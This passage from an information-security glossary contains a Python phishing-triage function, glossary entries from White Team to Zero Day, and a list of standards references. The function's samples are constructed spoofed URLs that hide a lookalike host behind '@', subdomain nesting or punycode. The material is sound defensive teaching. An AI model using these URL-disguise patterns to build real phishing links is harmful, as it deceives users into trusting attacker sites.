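The following is an added example, not part of the original glossary; it illustrates the URL SPOOFING and WEBSITE SPOOFING entries above. Given a URL and a set of hosts the organization trusts, it reports the indicators a phishing-triage script would look for: a plaintext scheme, a trusted name placed before "@" so that it appears first in the address bar, a punycode label that may hide a homograph, and a trusted name embedded in a host whose real registrable domain is something else. The trusted host and the sample URLs are constructed.

```python
from urllib.parse import urlsplit

# Constructed set of hosts the organisation treats as legitimate (not from the original page).
TRUSTED_HOSTS = {"bank.example"}


def _alnum(s: str) -> str:
    """Keep only letters and digits, so 'bank-example' and 'bank.example' compare equal."""
    return "".join(c for c in s if c.isalnum())


def spoof_indicators(url: str, trusted=TRUSTED_HOSTS) -> list:
    """Return the spoofing indicators found in a URL (an empty list means none).

    Checks, in order: plaintext scheme; credentials in the authority part
    (https://bank.example@evil.example/ shows the trusted name first);
    punycode labels, which may hide a homograph; and a trusted name embedded
    in a host whose registrable domain is something else
    (bank.example.evil.example, bank-example.example).
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    found = []
    if parts.scheme != "https":
        found.append("not-https")
    if "@" in parts.netloc:
        found.append("userinfo-in-authority")
    if any(label.startswith("xn--") for label in host.split(".")):
        found.append("punycode-label")
    for name in trusted:
        if host == name or host.endswith("." + name):
            continue  # the trusted host itself, or one of its own subdomains
        if _alnum(name) in _alnum(host):
            found.append("trusted-name-embedded")
            break
    return found


if __name__ == "__main__":
    samples = (
        "https://bank.example/login",
        "https://login.bank.example/",
        "https://bank.example@evil.example/login",
        "http://bank.example.evil.example/",
        "https://bank-example.example/",
        "https://xn--bnk-3ye.example/",  # constructed: a label already in punycode form
    )
    for u in samples:
        print(f"{u:45} {spoof_indicators(u)}")
```

The host-name heuristics are deliberately simple; production triage would also resolve the registrable domain with a public-suffix list and compare against the organization's full set of brands.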

WHITE TEAM
A group responsible for refereeing an engagement between a Red Team of mock attackers and a Blue Team of actual defenders of information systems.

WHITELIST
A list of entities that are considered trustworthy and are granted access or privileges (also called an allow list).

WORK FACTOR
An estimate of the effort or time needed by a potential adversary, with specified expertise and resources, to overcome a protective measure.

WORM
A self-replicating, self-propagating, self-contained program that uses networking mechanisms to spread itself.

ZERO DAY
A zero-day vulnerability is one that becomes known, or is exploited, before the vendor has a fix available; a zero-day exploit is an exploit for such a vulnerability. The name reflects that defenders have had zero days to patch; by one common convention, day one is the day a patch becomes available.


Library

CNSSI 4009, National Information Assurance (IA) Glossary, June 2006.
CISSP® All-in-One Exam Guide, Fourth Edition, Shon Harris, The McGraw-Hill Companies, 2008.
Official (ISC)2® Guide to the CISSP® CBK, Harold F. Tipton et al., Auerbach Publications, 2006.
Official (ISC)2® Guide to the CISSP® Exam, Susan Hansche et al., Auerbach Publications, 2004.
NIST SP 800-16, Information Technology Security Training Requirements: A Role- and Performance-Based Model, April 1998.
NIST SP 800-30, Risk Management Guide for Information Technology Systems, July 2002.
NIST SP 800-37, Guide for the Security Certification and Accreditation of Federal Information Systems, May 2004.
NIST SP 800-53, Rev. 2, Recommended Security Controls for Federal Information Systems, December 2007.
NIST SP 800-64 Rev. 1, Security Considerations in the Information System Development Life Cycle, June 2004.
NIST SP 800-61, Computer Security Incident Handling Guide, January 2004.
NIST SP 800-65, Integrating IT Security into the Capital Planning and Investment Control Process, January 2005.
NIST SP 800-67, Recommendation for the Triple Data Encryption Algorithm (TDEA) Block Cipher, May 2004.
NIST SP 800-77, Guide to IPsec VPNs, December 2005.
FIPS 46-3, Data Encryption Standard (DES), October 1999.
FIPS 140-2, Security Requirements for Cryptographic Modules, May 2001.
FIPS 180-2, Secure Hash Standard (SHS), August 2002.
FIPS 185, Escrowed Encryption Standard, February 1994.
FIPS 186-2, Digital Signature Standard (DSS), January 2000.
FIPS 197, Advanced Encryption Standard, November 2001.
FIPS 198, The Keyed-Hash Message Authentication Code (HMAC), March 2002.
FIPS 199, Standards for Security Categorization of Federal Information and Information Systems, December 2003.
FIPS 200, Minimum Security Requirements for Federal Information and Information Systems, March 2006.
Information Assurance Technical Framework (IATF), Release 3.1, NSA IA Solutions Technical Directors, September 2002.
ISO/IEC 15408-1:2005, Evaluation Criteria for IT Security - Part 1: Introduction and General Model, 2005.
ISO/IEC 15408-2:2005, Evaluation Criteria for IT Security - Part 2: Security Functional Requirements, 2005.
ISO/IEC 15408-3:2005, Evaluation Criteria for IT Security - Part 3: Security Assurance Requirements, 2005.
BS ISO/IEC 17799:2005, Code of Practice for Information Security Management, 2005.
Control Objectives for Information and related Technology (COBIT), Release 4.0, IT Governance Institute, 2005.
ISO/IEC 21827, Systems Security Engineering - Capability Maturity Model (SSE-CMM®), 2002.
ISO/IEC 27001, Information Security Management Systems - Requirements, 2005.
Draft MIL-STD-499C, Systems Engineering, Aerospace Corporation, April 15, 2005.
ISO/IEC 15288:2008(E), IEEE Std 15288-2008, Systems and Software Engineering - System Life Cycle Processes, February 1, 2008.
IEEE STD 1220-2005, IEEE Standard for Application and Management of the Systems Engineering Process, September 9, 2005.
IEEE/EIA 12207.0-1996, Industrial Implementation of International Standard ISO/IEC 12207:1995 Software Life Cycle Processes, March 1998.
IEEE/EIA 12207.1-1997, Industrial Implementation of International Standard ISO/IEC 12207:1995 Software Life Cycle Processes - Life Cycle Data, April 1998.
IEEE/EIA 12207.2-1997, Industrial Implementation of International Standard ISO/IEC 12207:1995 Software Life Cycle Processes - Implementation Considerations, April 1998.
DoD 5200.28-STD, Department of Defense Trusted Computer System Evaluation Criteria, December 1985 (a.k.a. Orange Book).
NCSC-TG-003, Version 1, A Guide to Understanding Discretionary Access Control in Trusted Systems, September 30, 1987 (a.k.a. Neon Orange Book).
Information Technology Security Evaluation Criteria (ITSEC), Version 1.2, June 1991.